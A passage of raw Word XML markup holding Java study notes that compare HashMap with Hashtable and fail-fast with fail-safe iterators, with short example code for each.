            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC2927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ynchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="17FBC76F" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="534B39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7E2A68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non-thread-safe operations or externally synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D1A60A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egacy code, not recommended for new code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7367D8B5" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="311EA71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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFD1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 ConcurrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA5E5A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perties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71F19BED"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79AAD">
          <v:rect id="_x0000_i1460" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7BCD2"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2713A98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 (Allowing Null Key and Value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B160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967F12B" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="439BB91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HashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48178EB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B4F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74AF60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null, "No key");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0727016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Fruit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6E807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428B0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null=No key, Apple=Fruit}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD527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B1192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1F1EBF"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 Example (No Null Key/Value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EB71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table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307FA569" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF98C1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tableExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7FBA6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1FB54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table = new Hashtable&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B0C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41B8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commenting the next line will cause a NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F0D8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able.put(null, "No key"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABF79A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AAE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ble.put("Apple", "Fruit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA816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3747B"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ble); // Output: {Apple=Fruit}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47087CB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A5067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F6E8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table example, trying to insert a null key would result in a NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0DA1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DB0017"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For most use cases where thread-safety is not required, and for improved performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9F4F7E"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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If you need a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>legacy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class, or if you specifically need the built-in synchronization, but this is rarely recommended in modern applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00645A1C" w14:textId="725902D4" w:rsidR="00121FDE" w:rsidRPr="00CE4B95"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F1F1EE" w14:textId="366BBFA7" w:rsidR="00E37BCB" w:rsidRPr="00CE4B95" w:rsidRDefault="00E37BCB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc197867353"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Fail</w:t>
      </w:r>
      <w:r w:rsidR="00536F8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Fast and </w:t>
      </w:r>
      <w:r w:rsidR="00536F82" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Fail-Safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iterator?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w14:paraId="3144A044" w14:textId="5584263D"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terators are used to iterate over collections like lists, sets, and maps. The term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describe how iterators behave when a collection is modified while it is being iterated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C52C31"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9A05">
          <v:rect id="_x0000_i1462" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D2553"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ail-Fast Iterator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCDAC9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iterator immediately throws an exception if the collection is modified </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>structurally</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., adding or removing elements) during iteration. This is a safeguard to prevent concurrent modification errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30638CC7"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If the collection is modified by any thread (or the same thread) while iterating over it, the iterator detects this change and throws a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to signal that the iteration is no longer valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761C794B"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Fast Iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D662BA1"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13A4A339"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E166C1E"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D3E8D65"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53C33501"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ail-fast behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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2A17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62D155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13D6EE27" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377B07D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FastExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E97DE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8EFD5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2D9A2CA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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAFDD0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0BBF57F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9F8E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721E4B8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45866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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794265D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034A31C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63F07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throw ConcurrentModificationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CCA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6D1610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59832F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CA5C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5B6A4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081303"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ConcurrentModificationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE13EE"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08DF9A5C"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fast iterators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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05316982"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t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>detect modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while iterating and throw an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A9488A"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behavior is designed to prevent bugs due to unexpected modifications during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050A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E667D">
          <v:rect id="_x0000_i1463" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E3877E"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ail-Safe Iterator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D1CFE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erator does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collection is modified while iterating. Instead, it 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meaning changes to the original collection during iteration are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not reflected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the iterator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6321B6AB"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When using a fail-safe iterator, the collection itself is not directly modified during iteration. The iterator uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clon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causing issues in the iteration process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F69B197"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Safe Iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE9DD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List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7588F1A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Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AA88C1"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264D10E2"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Fail-safe iterators work in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These collections create copies of the data during iteration, so even if the collection is modified, the changes do not affect the current iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D6D7D"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AE47E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CopyOnWriteArrayList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320832C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7F907399" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63AFB21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SafeExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664FD9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54DF8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pyOnWriteArrayList&lt;String&gt; list = new CopyOnWriteArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730EEE1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ED1CC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71A75DD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73D3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428477F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B2AC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 (does not throw exception)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A4EB4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35E3250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0FC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throw ConcurrentModificationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0668F47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0376BE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7D7C4B6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65A69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B5494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8C86A"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7CBD5702"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BFD307"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F6B38"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 Points</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5290F53F"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allow modifications to the underlying collection during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D4AAE"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ork by iterating over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issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6B20D"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do not throw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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A98972"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EBDDA">
          <v:rect id="_x0000_i1464" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="440AA365"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766"/>
        <w:gridCol w:w="3896"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="68DA54D0" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672B306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EBFF8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Fast Iterator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EB60B3F"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Safe Iterator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6770D829" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF4A31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 Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3621F9B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ConcurrentModificationException if the collection is modified during iteration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50765A3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hrow an exception if the collection is modified during iteration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="4AE9CC6D" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F217C5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erlying Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72AC724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ly iterates over the original collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CA8985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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="11F1B257" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0654449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69D945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Modifications from multiple threads will lead to issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F3DD3C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ifications can happen safely from other threads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="5B8F83F5" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0053669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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A92433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HashSet, HashMap (non-concurrent collections).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="782918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OnWriteArrayList, CopyOnWriteArraySet, ConcurrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="4F75C7CC" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BC6357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DFE839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efficient</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> as it directly modifies the original collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="580B959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efficient</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> due to the overhead of copying the collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7F45C15E" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="747EBB1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3CDB72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single-threaded environments or when concurrent modifications are not expected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49D158B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multi-threaded environments where concurrent modifications are allowed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32181F45" w14:textId="605FC528" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6274781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93055B6" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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l-Fast Iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are useful for detecting errors early, particularly when concurrent modifications to the collection are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54FFE8" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>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Fail-Safe Iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are suitable for multi-threaded applications where concurrent modifications are expected, and they allow safe iteration even when the collection is modified during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58881AA3" w14:textId="1B214B18"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A55EF" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="0002149E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E52B49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0" w:name="_Toc197867354"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
